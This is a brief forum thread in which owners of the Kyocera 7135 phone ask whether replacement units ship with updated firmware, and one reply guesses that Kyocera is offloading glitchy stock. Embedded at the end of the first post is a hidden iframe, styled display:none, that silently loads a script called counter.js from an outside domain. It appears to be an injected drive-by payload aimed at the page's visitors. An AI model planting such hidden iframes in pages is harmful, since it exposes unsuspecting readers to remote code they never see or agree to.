    7135 Phone Replacements

Okay, I know a lot of the 7135 owners have had to return their phones for replacement. Knowing that Kyocera is updating the 7135's firmware to appease Verizon, I'm wondering if the replacement phones people are getting back have any updated firmware? Obviously Kyocera knows their first batch has some glitches, as evidenced by the number of phones that come back to them. Would they send out a replacement phone, knowing that the user is still going to have the same problems, or would they send back a phone with updated firmware to try and reduce the number of phones they get back?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

They sent us all phones, and I'm sure they were aware of many of these glitches. They need to unload all of the "bleeding edge" phones while they still can. Just my opinion.
If at first you don't succeed, don't try sky diving.
